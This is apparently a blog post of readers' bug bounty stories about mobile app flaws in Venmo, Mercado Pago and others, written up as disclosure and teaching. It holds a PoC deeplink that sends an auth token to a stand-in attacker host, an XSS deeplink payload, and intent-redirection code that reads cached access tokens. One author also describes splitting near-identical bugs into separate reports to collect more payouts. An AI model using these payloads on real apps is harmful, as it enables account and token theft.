Invites in exchange for stories

Mobile AppSec World, I’m playing among subscribers. Over the past few weeks, I have already issued invites to OFFZONE 2022, which will be held on August 25-26 in Moscow, and to Mobius, which was in St. Petersburg.

For the contest, I asked subscribers to send me the most interesting, funny, ridiculous, stupid or memorable vulnerabilities that they have ever found in mobile (and not only) applications.

Since a lot of developers read the channel, I also asked them to send in the most amazing thing they saw in their application security audit reports. After all, all of us (pentesters) once wrote something not entirely correct, especially if the report was empty and we did not find anything (yes, this also happens from time to time).

And here I just collected the coolest stories that were sent to me so that you can also read them and smile with me (spelling and style are completely transferred from the authors’ message without changes).

So let’s go!

Story #1 by @artebels

Not exactly mobile, but still. The dumbest bug was in the registration function in one mobile application. The playback looked like this:

  1. User A creates a new account using email and password

  2. User B creates a new account using user A’s email and his password

  3. User B gets into user A’s account

Do you know how they fixed this bug? Added two-factor to check the code from the mail.
Do you know how it worked out? It’s just that the parameter with the code from the mail was deleted in the post request!

Story #2 by @impact_l

Pour some tea, make yourself comfortable. I’ll tell you a story about how I found a vulnerability in PayPal mobile app. Namely, we will talk about their asset. com.venmo. One fine morning, as usual, I decided to throw apk into jadx to find a vulnerability.

Looking through the lines of code, one class, the second… Nothing interesting. At this point, I was upset, I thought about moving on to the next asset, but my eye caught on the webview class.

Yes, yes, there was an interesting function that automatically assigned an AuthorizationToken when loading a page in a WebView.

Naturally, it was possible to send the url directly to the class via deeplink venmo://webview?url=https://www.google.com/

That’s just there was a host check.
– Perhaps it is implemented incorrectly. I thought aloud.

And the verification code was as follows:

public static boolean isSecureVenmoHostUrl(Uri uri) {
        boolean z = false;
        if (uri == null) {
            return false;
        }
        String host = uri.getHost();
        String scheme = uri.getScheme();
        if (host != null && scheme != null 
&& scheme.equalsIgnoreCase(BuildConfig.SCHEME) 
&& (host.endsWith(".venmo.com") || host.equals("venmo.com") || host.endsWith("venmo.biz"))) 
{
            z = true;
        }
        return z;
    }

You have 5 seconds to find the error.
5..
four..
That’s right, forgot to add a dot here host.endsWith("venmo.biz")

Without thinking twice, I decided to organize a PoC and check:

<a href="venmo://webview?url=https://fakevenmo.biz/theft.html"PoC> Intent Send</a>

Triager has arrived. Installed Triage. Hooray!
And then changed to Duplicate. Indicating that they already have a report with this error 401940. My indignation knew no bounds. Well congrats @bagipro well caught!

Naturally, I followed further updates of the application. And to my happiness (of course, because the bounty is 10k $), I found that the report #401940 marked as resolved, but the error is still in the application!

Quickly sitting down at the keyboard, I began to cut the report. Triager puts me a duplicate the next day. How so?
Putting an ultimatum with a request to add me to the report – Threw it here #450832. Well congrats @bagipro well caught (again)!

I tried to challenge the decision that my report is a duplicate because my report was submitted earlier #450832. But the triagers were relentless. In the end, resigned, he left this venture.

A year or two later. PayPal finally fixed the app. By making an incredible Fix:

host.endsWith(".venmo.biz")

That’s right, they added a dot.
– Now PayPal users are safe. He said out loud, rolling his eyes.

However, they still assign an AuthorizationToken when loading the url in the webview. This knowledge must be memorized.

Two years later, xss on a subdomain fell into my tenacious paws .venmo.com

Without thinking twice, I made a deeplink venmo://webview?url=https://legal.venmo.com/index.php?p=<script>alert()<script>
Having successfully applied the knowledge, I sent a report to PayPal, and got a well-deserved reward.

I don’t know if this story is sad or funny. At least it seems to me a little instructive

PS the story is real, all coincidences are not accidental

Story #3 by @artebels

Mobile and desktop chat could be globally blocked for all users by sending 50k characters to the chat. The problem was in the message handler, instead of splitting 50k characters into parts, it sent them in a whole packet, which killed the parser. And the next time you open the application, it did not even load to the list of incoming messages, it hung and fell.

Story #4 by @iSavAnna

The dumbest vulnerability I’ve ever seen was in the method of converting currencies. The current course was passed in the ala parameter “currancy_rate“. Accordingly, for 1 kopeck you could buy a dollar. It is paradoxical that this bug was in two payment systems and lived on the market for some time.
I sometimes find a similar thing when everything that is passed in a method is written in mongu and you can get a paid service by passing a flag.

Story #5 by @impact_l

After thinking for a long time and pondering what “the wildest game” means, I still mustered up the courage and chose the right story.

When we have a penetration test, we sometimes find vulnerabilities of the same type on assets. Most often, such finds are also reproduced, have the same origin and one source code. For example: the site has many fields that can be filled with various data, and next to each field there is a “save” button.
Now imagine that each field is vulnerable to XSS. “Why?” – you ask.
– Yes, because each field, even if it has different endpoints, they have one function responsible for sanitizing the parameters santizeField (input)
As a result, we observe in the report (especially when the whitebox penetration test), a lot and a lot of different url addresses, for completely different fields and parameters.
You can’t miss anything, suddenly another function is assigned to one of the urls and it’s gone. Thanks to the pentester for listing everything.
Or here is an example when there is only one XSS, and the CNAME for this domain is a lot of.

But it’s better to return to mobile applications, because the channel is not for web developers. What does a researcher, who moved the apk to the decompiler with the help of drag&drop technology, want to see the most as a result?

There is such an application Mercado Pago, it is intended for making online payments by users from Latin America.
Payments are important, you need to protect users and their funds. Therefore, in order to improve their AppSec processes, the company decided to launch the BugBounty program. Well, they posted their mobile application there.

Let’s see together what it consists of. Open AndroidManifest.xml
Loading…

<activity android:name="com.mercadopago.activitiesdetail.activities.NewOperationDetailActivity" android:exported="true">
<activity android:name="com.mercadopago.android.google.connect.core.webview.WebviewActivity" android:exported="true">
<activity android:name="com.mercadopago.withdraw.activities.SecondPassActivity" android:exported="true">
<activity android:name="com.mercadopago.withdraw.activities.WebviewActivity" android:exported="true">
<activity android:name="com.mercadopago.withdraw.activities.AddBankAccountActivity" android:exported="true">
<activity android:name="com.mercadopago.withdraw.activities.SelectBankAccountActivity" android:exported="true">
<activity android:name="com.mercadopago.withdraw.activities.SecondPassActivity" android:exported="true">
...+90

“Unbelievable, am I awake?” This is some kind of game, 100 exported activities !, and they all communicate with each other constantly using android.content.Intent?
That’s impossible. Probably, now I will open the classes and as a result there will be a stub for the flutter inside.

In fact – indeed, all application logic is written in Java (Kotlin).
All these 10 different activities responsible for different webviews are opened using a deeplink of the view mercadopago://wallet?url=http://google.com
Naturally, I started writing reports to the company about the Incredible Threat to User Information Security, assigning each report a Medium Severity Level, and describing how big the phishing threat was in the form of an open page inside the payment application.
The main thing is to take breaks between reports so that they do not guess that the vulnerabilities are similar.

After the first report, and payment for it, a week later, they made an incredible fix for one of the ten WebviewActivities, like this : android:exported="false"
Then, as carefully as possible, he sent one report after another.
“A goldmine! I won’t have to work anymore.” I thought.

But life is not so simple, after a few reports they guessed and immediately made a correction for several activity.
Damn! Okay, I’ll find something else.
Looking through the classes, I found the following code in the exported activity:

Intent intent = (Intent) SelectBankAccountActivity.this.getIntent().getParcelableExtra("select_bank_next_intent_extra");
SelectBankAccountActivity.this.startActivity(intent);
SelectBankAccountActivity.this.finish();

Yes, you have seen a standard vulnerability when, using malicious intent, you can access protected (not exported) application components. The point is that the application takes an “object” from the FlowState that an attacker can send, and then launches it.

Hooray! Now it remains to compile the PoC:

Intent next = new Intent("android.intent.action.VIEW");
next.setClassName(????)
//...
Intent intent = new Intent("android.intent.action.VIEW");
intent.putExtra("select_bank_next_intent_extra", next);
startActivity(intent);

But which activity to send a malicious intent on behalf of the application, if all the activities are already exported?
Showing incredible resourcefulness. I managed to find an okhttp cache inside the application that stored requests with an access_token.
Without thinking twice, I finally came up with the content for the next variable:

Intent next =  new Intent("android.intent.action.VIEW");
next.setClassName(getPackageName(),"com.myclass.Theft");
next.setFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION);
next.setData(Uri.parse("content://com.mercado.wallet.provider/images/okhttp/journal"));

By setting the severity level to High, I got another well-deserved reward. And you know, there were still a dozen of such activities that launched a nested intent.
The developers made the following fix: they removed the launch of the nested intent and set exported="false"
But even on report 5 with this vulnerability, they didn’t disable the okhttp cache.

Summing up, you need to find a fine line where one vulnerability begins and another ends in order to correct it correctly.
Developers, do not make such an architecture for applications, do not extract from a third-party application ParcelableIntent for its subsequent launch. I hope your code will always be safe!

PS the story is real, all coincidences are not accidental

Conclusion

Thanks to everyone who took part in the competition, as well as to everyone who read these stories and wondered with me. The winners deservedly received their tickets to the conference.

But the miracles do not end there, because I still have a few free tickets left, and I also plan to play them.

Thanks for reading and see you at the conferences!

Similar Posts

Leave a Reply